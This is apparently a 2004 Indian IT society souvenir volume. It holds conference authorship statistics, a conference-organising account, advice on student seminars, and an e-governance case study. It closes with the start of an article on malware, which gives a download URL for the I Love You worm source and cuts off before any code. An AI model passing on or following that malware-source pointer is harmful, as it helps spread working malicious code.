[12] DSTO (Defence Science and TechnologyOrganization) Data Fusion SpecialInterest Group Data fusion lexiconDepartment of Defence Australia 7 p21 September 1994

[13] Varshney P Distributed Detection and DataFusion 1995 Springer-Verlag NewYork NY

[14] Wald L A European proposal for terms ofreference in data fusion InternationalArchives of Photogrammetry and RemoteSensing Vol XXXII Part 7

[15]Cyber Forensics by Simson Garfinkel

[16] Waltz E and Llinas J Multisensor DataFusion 1990 Artech House Boston MA

OITS-2004

21

The Conferences on InformationTechnology or CITs as they are more popularlyknown have been organised by the OrissaInformation Technology Society every year since1998 It was the first ever internationalconference on IT to be held in Orissa and becamean instant hit The overwhelming success of thisedition conveyed the message that not only hadCIT arrived but it was here to stay Apart fromtheir successes academically these conferencesalso present some interesting patterns regardingthe multiplicity of the authors their regions aswell as the areas of research1 Multiplicity of authors

The papers presented in these conferenceshave had authors ranging between one andseven However it has been found that papershaving two and three authors have dominatedwhile papers having five or more authors havebeen few and far between (Fig1) The onlyexception came in the first edition when papershaving two authors comprised more than three-fifths of the total number of papers (Fig2) Thedetails of the multiplicity of authors have beenpresented in Table 1 which is drawn

Interesting Patterns in CITsA Misra

Silicon School of Information TechnologySilicon Hills Patia Bhubaneswar-751031

aurabindasiliconacin

2 Regions of participations In this section we will consider the

participating regions in terms of countries aswell as institutes With India being the hostcountry she has the maximum representationunderstandably But if we look at the trends inthe participation of other countries we can alsoobserve certain interesting patterns

Firstly the United States has the highestrepresentation from overseas having at least oneauthor in thirty-five papers over the six editionsIt is followed by Japan (11) and Australia(10) inthat order (Table 2) It may be noted with interestthat there were three papers from Brazil in the1999 edition but those are the only papers fromBrazil till date Besides there are about twelvecountries which have only one occurrence whileUSA and Japan have been represented in everyedition

However one discouraging factor has beenthe sharp decline in overseas participants overthe six editions (Fig 3) While in the first edition5405 of the papers had at least one overseasauthor the figure has been hovering around the25 mark in the last four editions In spite ofthis 2003 has recorded the highest number ofpapers having overseas particpation ietwenty-one

On the contrary papers from Orissa havebeen increasing steadily every year which hasbeen shown in Fig 4

As far as Institutes are concerned then theIITs have been the most prominent with theexceptions of IIT Delhi and IIT Roorkee whichhave respectively six and one one contributions

Number of authors per paperYear 1 2 3 4 5 6 71998 6 21 8 1 1 0 01999 8 12 13 8 1 2 02000 5 15 12 1 0 0 12001 3 20 24 5 1 0 02002 4 16 17 4 0 2 02003 9 34 33 4 3 0 0

Table 1

OITS-2004

22

Multiplicity patterns

Fig 11998

Fig 2

age of papers involving overseas au thors yearwise

Fig 3Year

Year

OITS-2004

23

till date Leading the pack are IIT Kharagpurwith thirty-five papers and IIT Guwahati withtwenty-seven Among the other IITs IIT Kanpurhas seventeen while IIT Bombay and IIT Madrashave nine apiece Among the other InstitutesJadavpur University has contributed seventeenpapers while University of Hyderabad hascontributed ten The list of the leading Institutesin terms of number of papers alongwith ayearwise breakdown is given in Table 3

Another interesting trend that can beobserved here is that while the USA leadsoverseas list none of the Institutes figure in thelist while one Institute from Japan figures in thelist It can be concluded that the papers from the

Country 1998 1999 2000 2001 2002 2003 TotalUSA 6 10 3 8 1 7 35

Netherlands 2 0 1 0 0 0 3Japan 2 3 1 3 1 1 11

Australia 3 0 1 1 2 3 10Kuwait 1 0 0 0 0 0 1China 1 0 0 0 0 1 2

Sweden 1 0 0 0 0 0 1UK 1 0 0 0 2 3 6

Portugal 1 0 0 0 0 0 1Italy 1 2 1 1 1 0 6

Canada 1 1 0 0 1 3 6Taiwan 0 1 0 0 0 0 1Brazil 0 3 0 0 0 0 3

Finland 0 1 0 0 0 0 1Mexico 0 1 0 0 0 0 1

Germany 0 1 1 0 0 0 2Malaysia 0 0 1 0 1 1 3

Macao 0 0 0 1 0 0 1Thailand 0 0 0 1 0 0 1Norway 0 0 0 1 1 0 2

Singapore 0 0 0 0 1 0 1Serbia amp

Montenegro 0 0 0 0 0 1 1Tanzania 0 0 0 0 0 1 1

Table 2USA have been scattered across the countrywhile those from Japan have been concentratedin some particular Institutes3 The Topics

As far the topics are concernedNetworking leads the table with a total ofthirtythree papers Among other topics ofprominence are Soft Computing with thirty-onepapers Web-based computing with eighteenand Parallel amp Distributed Computing withsixteen papers Even though there have beenpapers from almost all areas of ComputerScience none of those areas have featuredconsistently in these conferences

OITS-2004

24

Trends in papers having authors from Orissa

Fig 4

Bibliography1 Mahapatra RN ed CIT 98 Trends in

Information Technology Tata McGraw-HillNew Delhi

2 Mohanty H and Baral C ed CIT 99 Trendsin Information Technology Tata McGraw-Hill New Delhi

3 Ghosh RK and Misra D ed CIT 2000Proceedings of Third InternationaConference on Information Technology TataMcGraw-Hill New Delhi

Institute 1998 1999 2000 2001 2002 2003 TotalIIT Kharagpur India 5 0 3 8 5 15 36IIT Guwahati India 1 7 4 6 5 4 27

Jadavpur University India 5 3 0 5 2 2 17IIT Kanpur India 3 1 1 6 2 4 17

University of HyderabadIndia 0 1 0 5 1 3 10

IIT Bombay India 1 3 2 1 1 1 9IIT MadrasIndia 0 0 1 2 3 3 9Iwate PrefecturalUniversity Japan 2 1 1 2 1 1 8

Table 34 Pujari AK and Mohapatra P ed CIT 2001

Proceedings of Fourt InternationalConference on Information Technology TataMcGraw-Hill New Delhi

5 Iyer S and Naik S ed CIT 2002 Proceedingsof Fifth International Conference onInformation Technology Tata McGraw-HillNew Delhi

6 Chakraborty G and Sarkar S ed CIT 2003Proceedings of Sixth InternationalConference on Information Technology TataMcGraw-Hill New Delhi

Year

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

While western world has already masteredthe art of holding conferences developingcountries are slowly gearing up to hosting qualityconferences A quality conference in generalrequires both quality and quantity ofparticipation until and unless the conference isvery narrowly focused Holding a conferencerequires quite a bit of pre-preparation andplanning The conference team needs to managethe logistics of interacting with a large numberof authors reviewers invited speakers potentialsponsors and delegates besides maintaining dayto day communication among all the teammembers This article enumerates the strategiesadopted to enhance both the quantity andquality aspect of an international conference1 inthe area of information technology held inDecember 2003 This conference was successfulin terms of participation management and otheraspects as expressed by various attendees of theconference and also in comparison withprevious conferences held by the same group

Experiences amp Learning from Organising anInternational Conference in a Developing Country

Laxman MohantyPhD Scholar BITS-Pilani

T-10 IIM Campus Vastrapur Ahmedabad-380015

Extending the ReachThe first and foremost challenge for a

conference is to reach to potential authors andthen attract as many delegates as possibleThough the particular conference had been heldconsecutively for last 5 years and had created aname for itself still it remained more or lessconfined to members of the parent associationand their friends It was found that faculty ofmany engineering colleges in India were notaware of the conference but on being told aboutit they showed keen interest to participate in itThus to extend the reach of the conferencefollowing strategies were adopted An e-group was created with the e-mail IDs

found from the proceedings of previousconferences Later this group was extendedusing e-mail IDs received from manypostings received in other e-groups likeBytesforall and IDs received from anotherteam member This e-group was used tobroadcast the call for paper (CFP)announcement 2 to 3 times Request was alsomade to members to forward the call forpaper to all people they knew and whowould be interested in the conference

An address list of engineering colleges ofIndia derived from the approved list ofengineering colleges of All India Council ofTechnical Education (AICTE) was preparedThis list was enriched by the addresses ofIndian Institutes of Technology (IITs)National Institutes of Technology (NITs)Indian Institutes of Information Technology

1 The author was the Organising Chair of theConference

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

The conference also had a unique financingmodel Its registration fee was kept sufficientlylow to attract large number of participants Thusthe registration fees alone were not sufficient tomeet all the expenses Though the conference isorganized by an association in reality a localengineering college takes the lead every year inhosting it while other colleges provide financialsupport So a large part of the financialrequirement was met by the contribution fromthe local engineering colleges In return thesecolleges were given free registration for certainnumber of participants in the conference andthe tutorials

Tutorials were designed in such a way(content duration course materials and otherfacilities wise) that participants would not mindpaying to attend them Independentsponsorships were sought from local collegesfor special events and this was acknowledgedduring the event Besides association membersstaying abroad were able to garner a large chunkof financial support from some corporates Govtorganization like CSIR also extended somesupport The conference was able to generate asmall surplus besides meeting all its needs Thissurplus is given to the parent association to carryout computer awareness activitiesConclusion

The whole experience of being part of theorganizing team that carried out planningdesigning and organizing of the conferenceshowed that by bringing in innovation todifferent dimensions of the conference a teamcan not only enhance both the quality andquantity of participation among variousstakeholders it can turn the whole experienceinto an enriching and fun filled experience

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

for undergraduate engineering students in theirfinal year is an important and statutory part ofany university curriculum Seminar measuresmostly the external abilities and projectmeasures the internal abilities of a studentThrough seminar besides the technicalknowledge the presentation communicationand interpersonal skills of a student also getreflected Through project the depth of technicalknowledge acquired amp degree of understandingon fundamentals of engineering subjects by thestudent get evaluated Also to some extent thepresentation skills of a student gets reflect whenhe or she submits the project report and presentsbefore the audience (examiners studentcolleagues etc) A student goes through varietiesof engineering subjects (both theory andsessional) during his or her engineering studtyThese papers are mainly divided into twocategories (i) Core papers amp (ii) Supportingpapers Seminars and projects are based on thethorough understanding of all these papers bythe students Besides these course curriculumknowledge the projects amp seminars are alsobased on the extra or additional knowledgeacquired by the students by going throughvarious journals magazines research papersCDs internet amp reference books etc and byattending several tutorials workshopsseminars conferences symposiums andtechnical competitions etc

In short seminar and project are one typeof indicators of a students mental capability and

orientation to face and accept the practical andtechnical challenges in the real scenarios infuture

Role of faculty members as guides aco-guides

A student needs active support from his orher guide or co-guide for preparing himself orherself to present seminar and carrying out aproject work successfully Normally this guideis one of the faculty members of the concerneddepartment But some cases when a studentcarries out a project work in an organizationother than his or her institute a member of thatorganization becomes the guide However inthat case one of the faculty members of thedepartment must become a co-guide The role orthe co-guide is very important in the sense thathe or she has to orient the project done by thestudents as per the University guidelines Aseminar can be presented individually or ingroup (normally no of group members shouldnot exceed 3) Each Seminar team (either onemember or multiple members) must be linkedwith a guide called seminar guide Similarly aproject can be done individually or in group(normally no of group members should notexceed 5) Each project team (either one memberor multiple members) must be linked with a guideor co-guide called project guide or project co-guide Selecting a guide by a student group orvice versa is normally done through mutualconsultation Head of the department can playthe role of a negotiator in this situation For abetter focus and attention no of project teamsunder the supervision of a project guide or co-

OITS-2004

30

guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

